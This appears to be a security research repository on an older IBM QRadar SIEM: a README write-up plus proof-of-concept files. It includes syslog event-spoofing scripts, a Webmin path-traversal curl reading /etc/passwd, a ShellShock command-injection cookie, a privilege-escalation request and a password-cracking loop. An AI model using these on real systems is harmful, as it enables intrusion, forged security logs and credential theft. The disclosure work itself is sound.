├── PoCs ├── FILE_INCLUTION.sh ├── INJECT_EVENTS.py └── PE_AUTHENTICATED_USER.http ├── README.md ├── _config.yml ├── crypt_test.py ├── reply_event.py └── scapy_send.py /PoCs/FILE_INCLUTION.sh: -------------------------------------------------------------------------------- 1 | curl --sslv3 -k -v -d https://192.168.1.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 2 | -------------------------------------------------------------------------------- /PoCs/INJECT_EVENTS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys 4 | import time 5 | import random 6 | import socket 7 | import logging 8 | import datetime 9 | 10 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 11 | 12 | from scapy.all import * 13 | 14 | # Globals 15 | SIEM_IP = "192.168.1.1" 16 | SIEM_UDP_PORT = 514 17 | 18 | 19 | def _FormPacketPayload(source_ip, source_hostname, kind, user, port=123, original_host="Scarry!"): 20 | months_arr = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'] 21 | 22 | now = datetime.now() 23 | day = "%02d" % (now.day,) 24 | month = "%02d" % (now.month,) 25 | hour = "%02d" % (now.hour,) 26 | minute = "%02d" % (now.minute,) 27 | second = "%02d" % (now.second,) 28 | date_formatted = "%s-%s-%s" % (now.year, month, day) 29 | time_formatted = "%s:%s:%s" % (hour, minute, second) 30 | epoch_time = str(int(time.time())) 31 | month_name_short = months_arr[int(month)] 32 | 33 | # Test Params 34 | user_name = user 35 | event_id = str(4776) 36 | 37 | raw_test = "<13>%s %s %s %s AgentDevice=WindowsLog\tAgentLogFile=Security\tPluginVersion=1.0.14\tSource=Microsoft-Windows-Security-Auditing\tComputer=%s\tUser= \tDomain= 
\tEventID=4776\tEventIDCode=4776\tEventType=8\tEventCategory=14336\tRecordNumber=357588878\tTimeGenerated=%s\tTimeWritten=%s\tMessage=The computer attempted to validate the credentials for an account. Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Logon Account: %s Source Workstation: %s Error Code: 0x0 " % (month_name_short, day, time_formatted, source_hostname[1], source_hostname[0], epoch_time, epoch_time, user_name, original_host) 38 | 39 | return raw_test 40 | 41 | def _buildIP(src, dst): 42 | a = IP( 43 | src=src, 44 | dst=dst 45 | ) 46 | return a 47 | 48 | def _UDP(ip, dst_port, src_port=0): 49 | if src_port == 0: 50 | src_port = random.randint(5000,50000) 51 | b = ip/UDP(sport=src_port, dport=dst_port) 52 | return b 53 | 54 | def _AddPayload(packet, payload): 55 | return packet / Raw(load=payload) 56 | 57 | def _Send(packet, times, delay): 58 | for i in range(0,times): 59 | send(packet) 60 | time.sleep(delay) 61 | 62 | if __name__ == "__main__": 63 | DELIVERING_SERVER = ("main_dc.local", "192.168.1.100") 64 | SOURCE_IP = DELIVERING_SERVER[1] 65 | 66 | counter = 1 67 | 68 | user = "goodall" 69 | 70 | # Create a payload for user authentication success 71 | src_port = 1234 72 | payload = _FormPacketPayload( source_ip=SOURCE_IP, 73 | source_hostname=DELIVERING_SERVER, 74 | kind=4, 75 | port=src_port, 76 | user=user, 77 | original_host=DELIVERING_SERVER[0] 78 | ) 79 | 80 | pcket = _buildIP(src=SOURCE_IP, dst=SIEM_IP) 81 | udp = _UDP(ip=pcket, dst_port=SIEM_UDP_PORT, src_port=src_port) 82 | last = _AddPayload(packet=udp, payload=payload) 83 | _Send(last, times=counter, delay=0.2) 84 | -------------------------------------------------------------------------------- /PoCs/PE_AUTHENTICATED_USER.http: -------------------------------------------------------------------------------- 1 | POST /console/JSON-RPC/QRadar.saveUserPreferences HTTP/1.1 2 | Host: 192.168.1.1 3 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 
Firefox/54.0 4 | Accept: */* 5 | Accept-Language: en-US,en;q=0.5 6 | Accept-Encoding: gzip, deflate, br 7 | Referer: https://192.168.1.1/console/qradar/jsp/QRadar.jsp 8 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 9 | Content-Length: 391 10 | Cookie: JSESSIONID=72[trimmed]EC; SEC=32[trimmed]94 11 | Connection: close 12 | 13 | {method:"QRadar.saveUserPreferences",params:{"userJSON":{"id":"1","username":"admin","email":"my_personal_email@morirt.com","description":"","password":"123546","passwordConfirm":"123456","roleId":null,"spId":null,"validationErrors":{},"roleName":"","securityProfileName":"","locale":"en","timezone":null,"DISPLAY_NOTIFICATION_POPUPS":true}},sessionId:"32[trimmed]94",id:"875"} 14 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Polarising Pine 2 | 3 | ## Abstract 4 | 5 | This document and research was conducted after an interesting coincidence. A while back i was installing a new server and had requested a colleague of mine on how i might add this new server as a log source to our SIEM for monitoring. Expecting an agent or an elaborate set of instructions and key-exchange procedures i was surprised at learning that in order to be a log source on our SIEM, all you need to do is refer the syslog-ng service to the correct IP. 6 | 7 | This was a great surprise to me as i had expected that in order to input data into what is one of the most sensitive apparatuses of our organization you would need some sort of identification and presumably, authorization. I was at least expecting some “Approve” button on the system alerting the existence of a new log source. 8 | 9 | This prompted my curiosity. So after i validated that adding a log source does work in the way he mentioned, i went on to formulate some questions regarding that system to see what else i can understand regarding its operation. 
These will be the questions driving the research. 10 | 11 | 1. Does the SIEM automatically accept any device as a log source? 12 | 1. If there is no identification or authorization, how does the SIEM validate the authenticity of the data it receives and parses? 13 | 1. Can such a mechanism by circumvented? 14 | 1. Is it feasible create new events from a new log source? 15 | 1. Is it feasible to falsify new events from an existing log source (impersonation) ? 16 | 1. Is it feasible to falsify previous logs from an existing log source (impersonation) ? 17 | 1. Is it feasible to trigger alerting mechanism on events which had been injected into the system by falsifying data? 18 | 1. What security mechanism are in place on the OS level? 19 | 1. Which security mechanism are deployed on the interface level? 20 | 1. And mainly, is the SIEM system secure? 21 | 22 | With these questions in mind a research was initiated into the SIEM system in an attempt to understand its operation and security mechanism. 23 | 24 | It is critical to remember that these vulnerabilities have been tested on a relatively old version of the product. Most of the vulnerabilities described below are not applicable to the latest version. 25 | 26 | ## Methodology 27 | 28 | ### Events and Log Sources Research 29 | 30 | As part of the research process, the key point would be to understand the mechanism in which the systems operate and make decisions. In this case i've started by understanding which protocols for a log source are supported, how the system registers them and what kind of analysis is being made on that raw data. 31 | 32 | By default, the SIEM supports various types of log sources whilst the easiest one to setup and by far the most common one is syslog. We have started by understanding that the SIEM accepts connections for syslog on 514/udp and 5140/tcp. We have chosen to start understanding the UDP mechanism as it is easier to tamper with than the opponent, TCP. 
So the first start was to create a UDP listener on the SIEM to create a PCAP with some of that data. 33 | 34 | ```bash 35 | tcpdump -i eth0 udp port 514 -c 1000 -w capture.cap 36 | ``` 37 | 38 | Since everything on the SIEM is running as `root` (a promising sign indeed) we did not need to add `sudo`. The `-i eth0` is meant to restrict the capturing only to the correct adapter while `udp port 514` will only listen on the designated port and `-c 1000` will capture up to 1000 packets, as this is a live SIEM getting hundreds of events per second. 39 | 40 | When we have analyzed the packet capture we've seen something which can only be described as text-book-example syslog packets. No appended headers, trinkets or footers. The following text is a simple tab (‘\t') separated text which looks something like this: 41 | 42 | ``` 43 | Jan 1 11:11:11 192.168.1.1 AgentDevice=WindowsLog AgentLogFile=Security PluginVersion=1.0.14 Source=Microsoft-Windows-Security-Auditing Computer=main_dc User= Domain= EventID=4776 EventIDCode=4776 EventType=8 EventCategory=14336 RecordNumber=1089190650 TimeGenerated=111111111111 TimeWritten=111111111111 Message=The computer attempted to validate the credentials for an account. Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Logon Account: admin Source Workstation: main_dc Error Code: 0x0 44 | ``` 45 | 46 | Of course the names and IPs have been altered. 47 | So the next step was to broadcast the same packet again and see if it is being accepted. This was done with a quick and dirty python script you can find as `reply_event.py`. 48 | 49 | And lo and behold, a new event was created in the SIEM with those details. It took us some time to find it as we were looking for a new log source while that failed to appear. Apparently, the SIEM only writes that the event was reported by an IP but places the event as the log source of which the name appears in . 
As an example, this message was sent from an IP different to the one of the DC but the SIEM added the event under the DC because the host name in the raw data of the UDP packet pointed to it while logging in the details in the event that the event was reported by my IP. 50 | 51 | Next step was to see what will happen if the same packet would be sent from the same IP as the one of the DC server itself. For that scapy became very handy as you can see in `scapy_send.py`. 52 | 53 | And again, the SIEM had accepted this input as genuine but this time even the originating IP is the one of the DC. So in terms of looking even at the raw event data, the operator has no way of differentiating between this event and a real one. 54 | 55 | **PoC I - Injecting False Events** 56 | 57 | Next step was to buff it up to a level of a working code which is easy to modify and inject false events into the SIEM. So here you have `INJECT_EVENTS.py`. This is critical as `syslog` protocol is enabled by default so event if an organization is not working with `syslog` they will need to remember to disable it manually on the system. 58 | 59 | ### OS Research 60 | 61 | In terms of OS research, even though root access to the machine was granted, a method of remote, as well as local research was chosen. To enable both what a hacker will see as well as getting full details of the system. 62 | Nmap seemed like a good start remotely: 63 | 64 | ``` 65 | [root@machine /]# nmap -sV -O -A -p1-65000 192.168.1.1 66 | 67 | Starting Nmap 5.51 ( http://nmap.org ) at 2017-06-30 09:29 AST 68 | Nmap scan report for siem.local (192.168.1.1) 69 | Host is up (0.000032s latency). 70 | Not shown: 64960 closed ports 71 | PORT STATE SERVICE VERSION 72 | 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) 73 | | ssh-hostkey: 1024 0a:[trimmed]:e4 (DSA) 74 | |_2048 10:[trimmed]:e5 (RSA) 75 | 37/tcp open time? 
76 | 111/tcp open rpcbind 77 | 443/tcp open ssl/http Apache httpd 78 | |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 79 | 514/tcp open shell? 80 | 1514/tcp open unknown 81 | 4333/tcp open http Apache httpd 82 | |_http-title: Blocked 83 | |_http-favicon: 84 | 5432/tcp open postgresql PostgreSQL DB 85 | 7676/tcp open java-message-service Java Message Service 4.4 Update 1 86 | 7677/tcp open unknown 87 | 7777/tcp open cbt? 88 | 7778/tcp open interwise? 89 | 7779/tcp open unknown 90 | 7780/tcp open unknown 91 | 7781/tcp open unknown 92 | 7782/tcp open unknown 93 | 7790/tcp open unknown 94 | 7791/tcp open unknown 95 | 7793/tcp open unknown 96 | 7799/tcp open unknown 97 | 7800/tcp open asr? 98 | 7801/tcp open unknown 99 | 7803/tcp open unknown 100 | 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 101 | 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 102 | |_http-title: Apache Tomcat 103 | |_http-favicon: Apache Tomcat 104 | | http-methods: Potentially risky methods: PUT DELETE 105 | |_See http://nmap.org/nsedoc/scripts/http-methods.html 106 | |_http-open-proxy: Proxy might be redirecting requests 107 | 10000/tcp open http MiniServ 0.01 (Webmin httpd) 108 | |_http-methods: No Allow or Public header in OPTIONS response (status code 200) 109 | 15433/tcp open postgresql PostgreSQL DB 110 | 23333/tcp open unknown 111 | 32005/tcp open unknown 112 | 32009/tcp open unknown 113 | 32010/tcp open unknown 114 | 32011/tcp open unknown 115 | 34570/tcp open unknown 116 | 34571/tcp open unknown 117 | 34572/tcp open http Adaptec Storage Manager Agent httpd 118 | |_http-methods: No Allow or Public header in OPTIONS response (status code 501) 119 | |_http-title: %APPLICATION% 120 | 34573/tcp open ssl/unknown 121 | 50915/tcp open unknown 122 | 50978/tcp open unknown 123 | 54165/tcp open unknown 124 | 57290/tcp open unknown 125 | 3 services unrecognized despite returning data. 
If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : 126 | ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== 127 | SF-Port37-TCP:V=5.51%I=7%D=6/30%Time=5955EFB3%P=x86_64-redhat-linux-gnu%r( 128 | SF:NULL,4,"\xdd\0n3"); 129 | ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== 130 | SF-Port5432-TCP:V=5.51%I=[...trimmed...]; 131 | ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== 132 | SF-Port15433-TCP:V=5.51%I=[...trimmed...]; 133 | No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ). 134 | TCP/IP fingerprint: 135 | OS:SCAN(V=5.51%D=6/30%OT=[...trimmed...]) 136 | ``` 137 | 138 | As you can see, it's not that the attack surface was comprehensive but rather overwhelming. With expectations to find some services we can play around with, we have found almost all of them in an overwhelming abundance. 139 | 140 | First one that jumped to the start of the list was port 10000/tcp registered as ‘webmin'. A quick search gives us several vulnerabilities. We have attempted one straight off the page and found it to fail. Reason: SSL Handshake Failed. After some tests we found that the service uses an SSL version which is just not supported. Tweaking the `curl` command line a bit got us: 141 | 142 | **PoC II - Remote File Inclusion with root Access** 143 | 144 | ``` 145 | curl --sslv3 -k -v -d https://192.168.1.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 146 | ``` 147 | 148 | Which surprised us by simply coughing up `/etc/passwd`. So we went a step bolder and requested, kindly of course, for the `/etc/shadow` file. The service was kind enough to oblige. 
149 | At this point we've decided to look into the patching levels of the machine as the kernel seemed ‘a bit' outdated. We have listed in our notes that the system is vulnerable to ShellShock. We shall address that on the Web Admin Interface Research. 150 | 151 | #### Hardcoded Credentials with weak Storage 152 | 153 | So we figured out that the several files holding the username `configservices` which were interesting for us: 154 | ``` 155 | /opt/qradar/conf/templates/users.conf 156 | /opt/qradar/conf/templates/configservices_users.conf 157 | /opt/qradar/conf/users.conf 158 | /opt/qradar/conf/configservices_users.conf 159 | ``` 160 | 161 | The file `/opt/qradar/conf/configservices_users.conf` holds credentials stored with `crypt`. So we've wrote a little script to 'bruteforce' and check the passwords with some of the several most common dictionaries. 162 | 163 | ```python 164 | import crypt 165 | 166 | def login(pass2check, digest): 167 | username = "admin" 168 | cleartext = pass2check 169 | cryptedpasswd = digest 170 | return crypt.crypt(cleartext, cryptedpasswd) == cryptedpasswd 171 | 172 | passwords = ["AGuocsnOEaHlw", "/wEPae8TzCqmM"] 173 | words = open('10_million_password_list_top_1000000.txt', 'r').readlines() 174 | words = open('darkc0de.lst', 'r').readlines() 175 | words = open('rockyou.txt', 'r').readlines() 176 | 177 | 178 | for password in passwords: 179 | for word in words: 180 | if login(word.strip(), password): 181 | print word.strip(),":", password 182 | ``` 183 | 184 | Biggest issue for us that the user `admin` holds the password `initial`. 185 | 186 | 187 | ### Web Admin Interface Research 188 | 189 | #### Hardcoded root User 190 | 191 | When you thought things cannot really get worse… 192 | Exclaiming to my friend that the web interface is usually guarded and amongst those, the authentication features are heavily scrutinised so finding anything in there would be highly unlikely, i could not have been more wrong. 
193 | A simple ‘View Source' of the login page returned this: 194 | 195 | ```html 196 | 209 | ``` 210 | 211 | At this point i seriously started pondering the existence of a honeypot. So having a look at the configuration file for the users on the SIEM at `/opt/qradar/conf/users.conf` and `/opt/qradar/conf/configservices_users.conf`, which can be acquired by the previous issue we found the user. This removed the fear for a honeypot as no one in thier right mind will create a honeypot user with a password. Some password cracking for the hash there yielded that the plain text of the ‘military grade encryption' was set to `HIDDEN`. Commenting out the JavaScript "blockings" in the Web UI we logged in just fine. This user is an Administrative user on the UI and is hidden from other operators or Administrators. 212 | 213 | **The password is not really HIDDEN but since we deem this as extremly dangerous as the user is hardcoded and does not appear in any Admin UI and there seems to be no way of changing it except for in that particular file we have chosen for now to omit the actual password.** 214 | 215 | #### Exploit Reuse - ShellShock 216 | 217 | Reaching far back to the past to when we discovered the vulnerability of the system to ShellShock we were determined to check whether this can really be exploited remotely or "just" a locally exploitable vulnerability. 
218 | 219 | **PoC III - ShellShock Code Execution** 220 | 221 | ``` 222 | POST /console/config/config.cgi HTTP/1.1 223 | Host: 192.168.1.1 224 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:40.0) Gecko/20100101 Firefox/40.0 225 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 226 | Accept-Language: en-US,en;q=0.5 227 | Accept-Encoding: gzip, deflate 228 | Referer: https://192.168.1.1/console/do/qradar/rightadminconsole?appName=qradar&pageId=allTabs 229 | Cookie: JSESSIONID=60[trimmed1BF; SEC=3e[trimmed1a6; () { :;}; echo COKKIE=SHELLY ; echo ; ping -c 5 MY_IP 230 | Connection: close 231 | Content-Type: application/x-www-form-urlencoded 232 | Content-Length: 101 233 | 234 | configarea=remoteservices&viewconf=staging%2Fglobalconfig&stoken=89[trimmed]18 235 | ``` 236 | 237 | And another ‘lo and behold' as Wireshark registers pings coming into my system from the SIEM! Just a reminder: all services under the SIEM are running at ‘root'. It is important to notice that in the new system which we have checked 'ShellShock' had been patched and this does not exist. 238 | 239 | #### Privilege Escalation 240 | 241 | Next step was to see if users' privileges are being regulated properly. Another user was created as an ordinary user which should be restricted. An attempt to alter other users' privileges or details failed. The SIEM had verified the privileges of the user and blocked the attempt. However, there was another form at the top of the toolbar to edit the user that was created. That form did not go through the entire ordeal of verifying the user's privileges as it was only supposed to change the user which it was on. The issue is that the system did not verify that by the cookies and authentication that was done but rather through the details in the form itself. 
242 | 243 | **PoC IV - Privilege Escalation via Authenticated User** 244 | 245 | ```json 246 | POST /console/JSON-RPC/QRadar.saveUserPreferences HTTP/1.1 247 | Host: 192.168.1.1 248 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0 249 | Accept: */* 250 | Accept-Language: en-US,en;q=0.5 251 | Accept-Encoding: gzip, deflate, br 252 | Referer: https://192.168.1.1/console/qradar/jsp/QRadar.jsp 253 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 254 | Content-Length: 391 255 | Cookie: JSESSIONID=72[trimmed]EC; SEC=32[trimmed]94 256 | Connection: close 257 | 258 | {method:"QRadar.saveUserPreferences",params:{"userJSON":{"id":"1","username":"admin","email":"my_personal_email@morirt.com","description":"","password":"123546","passwordConfirm":"123456","roleId":null,"spId":null,"validationErrors":{},"roleName":"","securityProfileName":"","locale":"en","timezone":null,"DISPLAY_NOTIFICATION_POPUPS":true}},sessionId:"32[trimmed]94",id:"875"} 259 | ``` 260 | 261 | And the answer was 'why not...'. 262 | 263 | ```json 264 | HTTP/1.1 200 OK 265 | Date: Wed, 28 Jun 2017 09:16:07 GMT 266 | Pragma: no-cache 267 | Cache-Control: must-revalidate 268 | Cache-Control: no-cache 269 | Cache-Control: no-store 270 | Expires: Thu, 01 Jan 1970 00:00:00 GMT 271 | Content-Type: UTF-8;charset=UTF-8 272 | Connection: close 273 | Content-Length: 124 274 | 275 | {"id":"875","result":{"message":null,"id":null,"success":true,"validationErrors":null,"serializedObject":null},"error":null} 276 | 277 | ``` 278 | 279 | #### Default Page 280 | 281 | This page discloses the use of apache on a Red Hat at `https://ip/.noindex.html`. 282 | 283 | 284 | ## Summary 285 | 286 | Generally speaking, a SIEM is a good idea and a must-have for every competent security team or every organization who takes their security seriously. IBM is a leading provider for such a tool with a lot of functionality and capabilities. 
However, there are lessons to be learned from purchasing a company and building on its product. Although we have seen major and significant improvements in the security of the latest versions, there is still a lot to be done.
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Logon Account: admin Source Workstation: main_dc Error Code: 0x0"""" 9 | 10 | try: 11 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 12 | sent = sock.sendto(data, (SIEM_ADDR, SIEM_PORT)) 13 | except socket.error, e: 14 | sys.stderr.write("Error: %s.\n" % str(e)) 15 | sys.exit() 16 | finally: 17 | sock.close() 18 | sys.stdout.write("Done.\n") 19 | -------------------------------------------------------------------------------- /scapy_send.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from scapy.all import * 4 | 5 | SIEM_ADDR = "192.168.1.2" 6 | SIEM_PORT = 514 7 | 8 | DC_ADDR = "192.168.1.100" 9 | DC_PORT = 9191 10 | 11 | data = """Jan 1 11:11:11 192.168.1.1 AgentDevice=WindowsLog\tAgentLogFile=Security\tPluginVersion=1.0.14\tSource=Microsoft-Windows-Security-Auditing\tComputer=main_dc\tUser= \tDomain= \tEventID=4776\tEventIDCode=4776\tEventType=8\tEventCategory=14336\tRecordNumber=1089190650\tTimeGenerated=111111111111\tTimeWritten=111111111111\tMessage=The computer attempted to validate the credentials for an account. Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0 Logon Account: admin Source Workstation: main_dc Error Code: 0x0"""" 12 | 13 | ip = IP(dst=SIEM_ADDR, src=DC_ADDR) 14 | udp = ip/UDP(dport=SIEM_PORT, sport=DC_PORT) 15 | final = udp/Raw(load=data) 16 | send(final) 17 | --------------------------------------------------------------------------------